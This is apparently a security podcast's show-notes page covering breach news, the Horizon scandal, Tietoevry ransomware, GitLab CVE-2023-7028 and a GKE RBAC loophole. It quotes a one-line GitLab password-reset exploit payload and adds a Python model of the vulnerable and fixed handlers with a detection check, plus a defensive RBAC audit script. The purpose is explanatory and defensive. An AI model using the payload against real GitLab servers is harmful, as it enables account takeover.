Säkerhetspodcasten #255 - Ostrukturerat V.6
Listen
- mp3, length: 59:52
Contents
The panel discusses recent news.
Mother of all breaches - the mother of all intrusions?
Rickard and others think it is a bit overhyped.
- Malwarebytes: “The mother of all breaches” - 26 billion records found online
- cybernews: Mother of all breaches reveals 26 billion records - what we know so far
- Troy Hunt: Inside the Massive Naz.API Credential Stuffing List
Mercedes-Benz GitHub token problem
Post/Horizon
- Continuous Delivery: Developers Blamed For The Post Office Horizon Scandal?
- The Guardian / Alex Hern: How the Post Office’s Horizon system failed: a technical breakdown
“of eight [people] in the development team, two were very good, another two were mediocre but we could work with them, and then there were probably three or four who just weren’t up to it and weren’t capable of producing professional code”
- Wikipedia: British Post Office scandal
- computerweekly: Horizon system EPOSS code writers lacked basic programming skills, public inquiry hears
- The Telegraph: Post Office scandal latest - Fujitsu data was ‘manipulated’, inquiry hears - watch live
Tietoevry
- Tietoevry: Update on the ransomware attack in Sweden: recovery work is progressing at Tietoevry
- ComputerSweden: After the Tietoevry attack - drug price reductions postponed
- The Record: Akira ransomware hits cloud service Tietoevry; numerous Swedish customers affected
NATO Quantum Strategy
GitLab
- NVD: CVE-2023-7028 GitLab user account password reset emails could be delivered to an unverified email address
- @rwincey: GitLab CVE-2023-7028 POC
The PoC from that post: the password-reset request carries the e-mail field as an array, so the reset link is mailed both to the victim's verified address and to the attacker's unverified one:
  user[email][]=valid@email.com&user[email][]=attacker@email.com
- PWNED
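To show why that one-line payload works, here is a runnable model of the bug class. This is an added example, not GitLab's code: the Rails-style parameter parsing, the user store and the mailer are hypothetical stand-ins so it runs offline. The vulnerable handler trusts the parsed list and mails the token to every address; the hardened one rejects anything but a single string and only mails the verified address; the last function is the log/WAF check a defender would want.

```python
"""The CVE-2023-7028 bug class, modelled as an added example.

Not GitLab's code: parameter parsing, user store and mailer below are
hypothetical stand-ins. The point is that `user[email][]=a&user[email][]=b`
parses to a list, and a handler that trusts that list mails the reset
token to an address it never verified.
"""
import secrets
from urllib.parse import parse_qs

# Constructed user store: verified e-mail address -> username.
USERS = {"valid@email.com": "victim"}

# The payload from the PoC (victim's verified address plus an attacker one)
# and a normal request for comparison.
ATTACK_BODY = "user[email][]=valid@email.com&user[email][]=attacker@email.com"
NORMAL_BODY = "user[email]=valid@email.com"


def parse_user_email(body: str):
    """Mimic Rack/Rails nested-parameter parsing for the user[email] key only.

    `user[email]=a` -> "a"; `user[email][]=a&user[email][]=b` -> ["a", "b"].
    Real Rack handles arbitrary nesting; this is the subset that matters here.
    """
    raw = parse_qs(body, keep_blank_values=True)
    if "user[email][]" in raw:
        return raw["user[email][]"]          # array form: a Python list
    if "user[email]" in raw:
        return raw["user[email]"][-1]        # scalar form: last value wins
    return None


def vulnerable_reset(body: str, outbox: list) -> bool:
    """Vulnerable handler: finds the account via any address in the list,
    then sends the same reset token to every address the client supplied."""
    email = parse_user_email(body)
    emails = email if isinstance(email, list) else [email]
    account = next((USERS[e] for e in emails if e in USERS), None)
    if account is None:
        return False
    token = secrets.token_urlsafe(16)
    for e in emails:
        outbox.append((e, account, token))   # attacker's address gets the token too
    return True


def hardened_reset(body: str, outbox: list) -> bool:
    """Fixed handler: only a single string is accepted, and the token goes
    only to the verified address stored for that account."""
    email = parse_user_email(body)
    if not isinstance(email, str):
        return False                         # arrays (or nothing) are rejected
    account = USERS.get(email)
    if account is None:
        return False                         # unknown address: nothing is sent
    outbox.append((email, account, secrets.token_urlsafe(16)))
    return True


def is_suspicious_reset(body: str) -> bool:
    """Log/WAF check: a reset request carrying more than one e-mail value
    is never legitimate and is the signature of this PoC."""
    email = parse_user_email(body)
    return isinstance(email, list) and len(email) > 1


if __name__ == "__main__":
    sent: list = []
    vulnerable_reset(ATTACK_BODY, sent)
    for addr, user, tok in sent:
        print(f"reset for {user} mailed to {addr}: {tok}")
```

The parsing step is the part worth remembering: any framework that turns `key[]` into an array will hand your handler a list where it expected a string, so type-check the field before using it, and grep your access logs for `user[email][]` appearing more than once per request.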
GKE Google Kubernetes Engine system:authenticated misconfiguration
Administrators who hand out rights to system:authenticated end up with fantastic security!
- orca security: Sys:All: How A Simple Loophole in Google Kubernetes Engine Puts Clusters at Risk of Compromise
- orca security: How the Sys:All Loophole Allowed Us To Penetrate GKE Clusters in Production
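The practical check that follows from Orca's finding: in GKE every authenticated Google account is a member of system:authenticated, so a binding to that group is a grant to anyone with a Google account. The script below is an added example (not Orca's or Google's tooling) that audits the JSON from `kubectl get clusterrolebindings,rolebindings -A -o json`, skips the discovery-level bindings Kubernetes creates by default, flags the rest, and shows the corrected binding. The sample items are constructed, and the list of default binding names is an assumption based on a stock cluster.

```python
"""Audit Kubernetes RBAC for bindings to system:authenticated / :unauthenticated.

Added example, not Orca's or Google's tooling. In GKE, system:authenticated
includes every Google account, so any binding to it beyond the Kubernetes
defaults is effectively open to the world. Input is the List object that
`kubectl get clusterrolebindings,rolebindings -A -o json` returns; the
items below are constructed for the example.
"""
import copy
import json

BROAD_GROUPS = {"system:authenticated", "system:unauthenticated"}

# Bindings Kubernetes itself creates for these groups (discovery-level only).
# Assumption: complete for a stock cluster; extend if your distribution adds more.
KNOWN_DEFAULT_BINDINGS = {
    "system:basic-user",
    "system:discovery",
    "system:public-info-viewer",
}

# Constructed sample: one default binding, two admin mistakes, one sane binding.
SAMPLE_ITEMS = [
    {
        "kind": "ClusterRoleBinding",
        "metadata": {"name": "system:discovery"},
        "roleRef": {"kind": "ClusterRole", "name": "system:discovery"},
        "subjects": [{"kind": "Group", "name": "system:authenticated"}],
    },
    {   # every Google account is now cluster-admin on this cluster
        "kind": "ClusterRoleBinding",
        "metadata": {"name": "dev-convenience"},
        "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
        "subjects": [{"kind": "Group", "name": "system:authenticated"}],
    },
    {   # namespace-scoped, but still open to every Google account
        "kind": "RoleBinding",
        "metadata": {"name": "ci-edit", "namespace": "prod"},
        "roleRef": {"kind": "ClusterRole", "name": "edit"},
        "subjects": [
            {"kind": "Group", "name": "system:authenticated"},
            {"kind": "ServiceAccount", "name": "ci", "namespace": "prod"},
        ],
    },
    {   # bound to a named group: not flagged
        "kind": "ClusterRoleBinding",
        "metadata": {"name": "platform-admins"},
        "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
        "subjects": [{"kind": "Group", "name": "gke-admins@example.com"}],
    },
]
SAMPLE_JSON = json.dumps({"kind": "List", "items": SAMPLE_ITEMS})


def load_items(raw_json: str) -> list:
    """Parse kubectl's `-o json` List output into its items."""
    return json.loads(raw_json)["items"]


def risky_bindings(items: list) -> list:
    """Return every non-default binding whose subjects include a broad group."""
    findings = []
    for item in items:
        name = item["metadata"]["name"]
        if item["kind"] == "ClusterRoleBinding" and name in KNOWN_DEFAULT_BINDINGS:
            continue
        groups = [
            s["name"]
            for s in item.get("subjects", [])
            if s.get("kind") == "Group" and s["name"] in BROAD_GROUPS
        ]
        if groups:
            findings.append({
                "kind": item["kind"],
                "name": name,
                "namespace": item["metadata"].get("namespace"),
                "role": item["roleRef"]["name"],
                "groups": groups,
            })
    return findings


def rebind(item: dict, replacement_group: str) -> dict:
    """Corrected binding: drop the broad groups, bind a named group instead.
    Other subjects (e.g. a service account) are kept; the input is not mutated."""
    fixed = copy.deepcopy(item)
    subjects = [
        s for s in fixed.get("subjects", [])
        if not (s.get("kind") == "Group" and s["name"] in BROAD_GROUPS)
    ]
    subjects.append({"kind": "Group", "name": replacement_group,
                     "apiGroup": "rbac.authorization.k8s.io"})
    fixed["subjects"] = subjects
    return fixed


if __name__ == "__main__":
    for f in risky_bindings(load_items(SAMPLE_JSON)):
        scope = f["namespace"] or "cluster-wide"
        print(f"{f['kind']} {f['name']} ({scope}) grants {f['role']} to {f['groups']}")
```

Run it against real output by piping `kubectl get clusterrolebindings,rolebindings -A -o json` into `load_items`. Anything it reports should be rebound to a specific user, group or service account; a namespace-scoped RoleBinding is not a mitigation, since the group membership is the problem, not the scope.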
Tommy Wiseau presents 1Password
The man known from blockbusters such as The Room (2003) presents a small, unknown company by the name of 1Password.
PoiEx - Points Of Intersection Explorer
A tool that visualises Infrastructure as Code and can display it in Visual Studio Code:
- github.com/doyensec/PoiEx - Visualize and explore IaC…
- doyensec: Introducing PoIEx - Points Of Intersection Explorer
The unrelated tool we briefly got sidetracked onto:
- github.com/semgrep/semgrep - Code scanning at ludicrous speed.